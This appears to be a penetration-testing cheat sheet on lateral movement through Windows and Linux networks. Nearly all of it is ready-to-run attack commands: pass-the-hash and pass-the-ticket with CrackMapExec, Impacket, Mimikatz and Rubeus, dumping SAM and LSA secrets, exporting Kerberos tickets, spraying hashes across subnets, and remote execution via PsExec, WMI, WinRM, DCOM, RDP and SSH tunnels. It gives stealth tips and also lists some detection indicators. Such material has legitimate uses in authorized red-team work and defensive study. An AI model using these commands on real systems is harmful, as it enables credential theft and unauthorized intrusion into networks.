Exploitation

Lateral Movement

Move through the network using captured credentials, hashes, and tickets to access additional systems.

Tool Installation

Impacket

PsExec, WMIExec, etc.

pip install impacket

Evil-WinRM

WinRM shell

gem install evil-winrm

CrackMapExec

Swiss army knife

github.com/byt3bl33d3r

Mimikatz

Credential extraction

github.com/gentilkiwi

Pass-the-Hash (PtH)

Use NTLM hashes directly without knowing the plaintext password. Works with local admin accounts and domain accounts.

Hash Format:

LM:NTLM - Full format (e.g., aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0)
:NTLM - NTLM only (LM is often empty)
Empty LM hash: aad3b435b51404eeaad3b435b51404ee

Warning

Local Admin Required: PtH to SMB requires local administrator privileges on the target. Domain user hashes won't work unless the user is a local admin.

CrackMapExec PtH

bash

# Execute command with hash
crackmapexec smb TARGET -u Administrator -H 'LM:NTLM' -x 'whoami'

# Just NTLM hash (common)
crackmapexec smb TARGET -u Administrator -H ':31d6cfe0d16ae931b73c59d7e0c089c0' -x 'whoami'

# Spray hash across network (find where admin creds work)
crackmapexec smb 192.168.1.0/24 -u Administrator -H 'HASH' --local-auth

# Check if user is local admin (Pwn3d!)
crackmapexec smb 192.168.1.0/24 -u Administrator -H 'HASH'

# Dump SAM hashes with PtH
crackmapexec smb TARGET -u Administrator -H 'HASH' --sam

# Dump LSA secrets
crackmapexec smb TARGET -u Administrator -H 'HASH' --lsa

# Execute PowerShell
crackmapexec smb TARGET -u Administrator -H 'HASH' -X 'Get-Process'

Impacket PtH

Impacket provides multiple execution methods with different stealth/detection tradeoffs.

bash

# PsExec - Creates service, interactive shell
psexec.py -hashes :NTLM_HASH Administrator@TARGET

# WMIExec - Stealthier, semi-interactive
wmiexec.py -hashes :NTLM_HASH Administrator@TARGET

# SMBExec - Uses named pipes
smbexec.py -hashes :NTLM_HASH Administrator@TARGET

# AtExec - Uses Task Scheduler (non-interactive)
atexec.py -hashes :NTLM_HASH Administrator@TARGET 'whoami > C:\output.txt'

# DCOMExec - Uses DCOM objects
dcomexec.py -hashes :NTLM_HASH Administrator@TARGET

# Full hash format also works
psexec.py -hashes 'aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0' Administrator@TARGET

Mimikatz PtH / Overpass-the-Hash

Overpass-the-Hash converts NTLM hash to a Kerberos ticket, allowing pass-the-hash to Kerberos-only services.

text

# Overpass-the-hash - spawns new process with Kerberos ticket
mimikatz# sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:powershell.exe

# The new PowerShell window has Administrator's Kerberos ticket
# Verify with: klist

# Access resources
dir \\target.corp.local\c$

# You can also use AES keys
mimikatz# sekurlsa::pth /user:Administrator /domain:corp.local /aes256:AES_KEY /run:cmd.exe

# Classic PtH (NTLM only, deprecated)
mimikatz# sekurlsa::pth /user:Administrator /domain:. /ntlm:HASH /run:cmd.exe

Pass-the-Ticket (PtT)

Use stolen Kerberos tickets to authenticate. Works even when NTLM is disabled.

Ticket Formats:

.kirbi - Windows format (Mimikatz, Rubeus)
.ccache - Linux format (Impacket)
Base64 - Rubeus output format
Convert between formats with ticketConverter.py

Export and Import Tickets

text

# Export tickets with Mimikatz (saves all tickets to .kirbi files)
mimikatz# sekurlsa::tickets /export

# Export specific ticket
mimikatz# kerberos::list /export

# Import ticket
mimikatz# kerberos::ptt ticket.kirbi

# Rubeus - dump all tickets (Base64 format)
Rubeus.exe dump /nowrap
Rubeus.exe dump /service:krbtgt /nowrap  # Just TGTs

# Rubeus - import ticket from Base64
Rubeus.exe ptt /ticket:BASE64_TICKET_STRING

# Rubeus - import from file
Rubeus.exe ptt /ticket:ticket.kirbi

# Verify ticket loaded (Windows)
klist

Impacket with Kerberos

bash

# Convert kirbi to ccache format
ticketConverter.py ticket.kirbi ticket.ccache

# Convert ccache to kirbi
ticketConverter.py ticket.ccache ticket.kirbi

# Set environment variable to use ccache
export KRB5CCNAME=/path/to/ticket.ccache

# Use any Impacket tool with Kerberos (-k flag, -no-pass)
psexec.py -k -no-pass corp.local/Administrator@target.corp.local
wmiexec.py -k -no-pass corp.local/Administrator@target.corp.local
secretsdump.py -k -no-pass target.corp.local
smbclient.py -k -no-pass corp.local/Administrator@target.corp.local

# IMPORTANT: Use FQDN (target.corp.local), not IP address!
# Kerberos requires matching hostname in ticket

Warning

DNS Required: When using Kerberos, you must resolve hostnames. Add DC to /etc/hosts or configure DNS. Use FQDNs, not IP addresses.

Remote Execution Methods

Different methods have different requirements, detection signatures, and capabilities.

PsExec

Creates a service on the remote system. Noisy but reliable.

bash

# Impacket PsExec (creates PSEXESVC service)
psexec.py corp.local/Administrator:Password123@TARGET
psexec.py corp.local/Administrator:Password123@TARGET 'cmd.exe /c whoami'

# Sysinternals PsExec
PsExec.exe \\TARGET -u corp\Administrator -p Password123 cmd.exe
PsExec.exe \\TARGET -u corp\Administrator -p Password123 -s cmd.exe  # SYSTEM

# CrackMapExec (tries multiple methods)
crackmapexec smb TARGET -u Administrator -p Password123 -x 'whoami'
crackmapexec smb TARGET -u Administrator -p Password123 -x 'whoami' --exec-method smbexec

Detection Indicators:

Service creation event (Event ID 7045)
File write to ADMIN$ share
Named pipe connections

WMI Execution

WMI is stealthier - no service created, uses existing WMI infrastructure.

bash

# Impacket WMIExec (semi-interactive shell)
wmiexec.py corp.local/Administrator:Password123@TARGET
wmiexec.py -hashes :NTLM_HASH Administrator@TARGET

# PowerShell WMI
$cred = Get-Credential
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c whoami > C:\output.txt' -ComputerName TARGET -Credential $cred

# Read output
Get-Content \\TARGET\c$\output.txt

# CIM (modern WMI)
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine='calc.exe'} -ComputerName TARGET -Credential $cred

# wmic command line (deprecated but still works)
wmic /node:TARGET /user:Administrator /password:Password123 process call create 'cmd.exe /c whoami'

WinRM (Evil-WinRM)

WinRM provides encrypted PowerShell remoting. Port 5985 (HTTP) or 5986 (HTTPS).

bash

# Evil-WinRM with password
evil-winrm -i TARGET -u Administrator -p 'Password123'

# Evil-WinRM with hash (PtH)
evil-winrm -i TARGET -u Administrator -H 'NTLM_HASH'

# Evil-WinRM with Kerberos ticket
evil-winrm -i target.corp.local -r corp.local

# Evil-WinRM features
menu                    # Show all features
upload /local/file      # Upload file
download C:\file        # Download file
services                # List services

# PowerShell remoting
$cred = Get-Credential
Enter-PSSession -ComputerName TARGET -Credential $cred

# Invoke-Command for mass execution
Invoke-Command -ComputerName server1,server2,server3 -Credential $cred -ScriptBlock { whoami; hostname }

# Check if WinRM is enabled
Test-WSMan -ComputerName TARGET

Tip

Enable WinRM: If WinRM is disabled but you have admin access via SMB, you can enable it remotely with: crackmapexec smb TARGET -u admin -p pass -M winrm -o ACTION=enable

DCOM Execution

DCOM is less monitored and often overlooked by defenders.

bash

# Impacket DCOMExec (uses MMC20 by default)
dcomexec.py corp.local/Administrator:Password123@TARGET
dcomexec.py -hashes :NTLM_HASH Administrator@TARGET

# Different DCOM objects
dcomexec.py corp.local/Administrator:Password123@TARGET 'whoami' -object ShellBrowserWindow
dcomexec.py corp.local/Administrator:Password123@TARGET 'whoami' -object ShellWindows
dcomexec.py corp.local/Administrator:Password123@TARGET 'whoami' -object MMC20

RDP Access

Full GUI access. Note: May kick off current user and is heavily logged.

bash

# Enable RDP via registry (if you have admin)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# Firewall rule for RDP
netsh advfirewall firewall set rule group="remote desktop" new enable=yes

# Add user to Remote Desktop Users group
net localgroup "Remote Desktop Users" username /add

# RDP with xfreerdp (Linux)
xfreerdp /u:Administrator /p:Password123 /v:TARGET /cert-ignore
xfreerdp /u:corp\\Administrator /p:Password123 /v:TARGET /cert-ignore  # Domain user

# RDP Pass-the-Hash (Restricted Admin Mode required)
xfreerdp /u:Administrator /pth:NTLM_HASH /v:TARGET /cert-ignore

# Enable Restricted Admin Mode (on target)
reg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

# RDP with rdesktop
rdesktop -u Administrator -p Password123 TARGET

# SharpRDP (command execution via RDP without full GUI)
SharpRDP.exe computername=TARGET command="whoami" username=Administrator password=Password123

Warning

Restricted Admin Mode: Required for RDP PtH. When enabled, credentials aren't sent to the remote machine (helps prevent credential theft but allows PtH).

SSH (Linux Targets)

For Linux systems or Windows with OpenSSH installed.

bash

# SSH with password
ssh user@TARGET

# SSH with key
ssh -i id_rsa user@TARGET
chmod 600 id_rsa  # Fix permissions if needed

# SSH tunneling for lateral movement
# Local port forward (access internal service from attacker)
ssh -L 8080:internal-host:80 user@pivot-host
# Now access http://localhost:8080 to reach internal-host:80

# SOCKS proxy (tunnel all traffic)
ssh -D 9050 user@pivot-host
# Use with proxychains

# Remote port forward (expose attacker service to internal network)
ssh -R 8080:localhost:80 user@pivot-host

# SSH with password (avoid interactive prompt)
sshpass -p 'password' ssh user@TARGET

# Execute command without interactive shell
ssh user@TARGET 'whoami; id; cat /etc/passwd'